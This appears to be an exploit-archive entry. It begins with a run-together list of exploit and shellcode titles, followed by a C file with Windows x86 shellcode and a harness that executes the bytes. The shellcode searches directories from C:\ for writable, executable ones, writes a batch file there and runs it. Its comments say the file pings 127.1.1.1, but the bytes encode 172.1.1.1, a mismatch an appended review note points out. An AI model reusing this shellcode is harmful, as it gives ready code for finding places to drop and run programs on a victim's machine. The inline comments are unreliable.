
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 
bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
/*
|
|
# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
|
|
# Date: 26-02-2017
|
|
# Author: lu0xheap
|
|
# Platform: Win_x86
|
|
# Tested on: WinXP SP1
|
|
# Shellcode Size: 130 bytes
|
|
*/
|
|
|
|
/*
|
|
Description:
|
|
write & exec dir searcher
|
|
starts from C:\
|
|
If dir found then write, execute (ping 127.1.1.1) and exit
|
|
If Write/noexec dir found then continue
|
|
|
|
Tested on WinXP SP1 (77e6fd35;77e798fd)
|
|
i686-w64-mingw32-gcc shell.c -o golddgger.exe
|
|
|
|
Null-free version:
|
|
|
|
(gdb) disassemble
|
|
Dump of assembler code for function function:
|
|
=> 0x08048062 <+0>: pop ecx
|
|
0x08048063 <+1>: xor eax,eax
|
|
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
|
|
0x08048068 <+6>: push eax
|
|
0x08048069 <+7>: push ecx
|
|
0x0804806a <+8>: mov eax,0x77e6fd35
|
|
0x0804806f <+13>: call eax
|
|
0x08048071 <+15>: xor eax,eax
|
|
0x08048073 <+17>: push eax
|
|
0x08048074 <+18>: mov eax,0x77e798fd
|
|
0x08048079 <+23>: call eax
|
|
|
|
|
|
NULL-free shellcode (132 bytes):
|
|
|
|
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
|
|
"\x50\x51\xb8"
|
|
"\x35\xfd\xe6\x77" // exec
|
|
"\xff\xd0\x31\xc0\x50\xb8"
|
|
"\xfd\x98\xe7\x77" // exit
|
|
"\xff\xd0\xe8\xe2\xff\xff\xff"
|
|
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
|
|
"\x2f\x43\x20\x22\x28\x63\x64\x20"
|
|
"\x63\x3a\x5c" // C:\
|
|
"\x20\x26\x46\x4f\x52"
|
|
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
|
|
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
|
|
"\x20\x44\x4f\x20"
|
|
"\x65\x63\x68\x6f\x20"
|
|
"\x70\x69\x6e\x67\x20"
|
|
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
|
|
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
|
|
"\x61\x74\x22\x26\x28\x63\x61\x6c"
|
|
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
|
|
"\x62\x61\x74\x22\x26\x26\x65\x78"
|
|
"\x69\x74\x29\x29\x22";
|
|
|
|
*/
|
|
// NULL version (130 bytes):
|
|
|
|
char code[] =
|
|
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
|
|
"\x35\xfd\xe6\x77" // exec
|
|
"\xff\xd0\x31\xc0\x50\xb8"
|
|
"\xfd\x98\xe7\x77" // exit
|
|
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
|
|
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
|
|
"\x43\x20\x22\x28\x63\x64\x20"
|
|
"\x63\x3a\x5c" // C:\
|
|
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
|
|
"\x20\x2f\x72\x20\x25\x41\x20\x49"
|
|
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
|
|
"\x20\x65\x63\x68\x6f\x20\x70\x69"
|
|
"\x6e\x67\x20"
|
|
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
|
|
"\x3e\x22\x25\x41"
|
|
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
|
|
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
|
|
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
|
|
"\x26\x26\x65\x78\x69\x74\x29\x29"
|
|
"\x22\x00";
|
|
|
|
int main(int argc, char **argv)
|
|
|
|
{
|
|
int (*func)();
|
|
func = (int (*)()) code;
|
|
(int)(*func)();
|
|
} |
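Review bot: The inline comment `// 127.1.1.1` next to the byte run `"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"` does not match the bytes, which decode to the ASCII string `172.1.1.1`; the same mismatch appears in the null-free listing inside the header comment and in the description line "execute (ping 127.1.1.1)". Either the comment and description should read `// 172.1.1.1` or the bytes were meant to encode the documented address; as written, anyone tracing the payload against the documentation arrives at a different value. The `// exec` and `// exit` comments label the raw addresses 0x77e6fd35 and 0x77e798fd that the header says were only observed on WinXP SP1, so stating in those two comments which function each address was resolved to would make the "Tested on" caveat self-explanatory. In `main`, `(int)(*func)();` casts the call result to int and then discards it, so `func();` reads more plainly, and `main` falls off the end without a `return`.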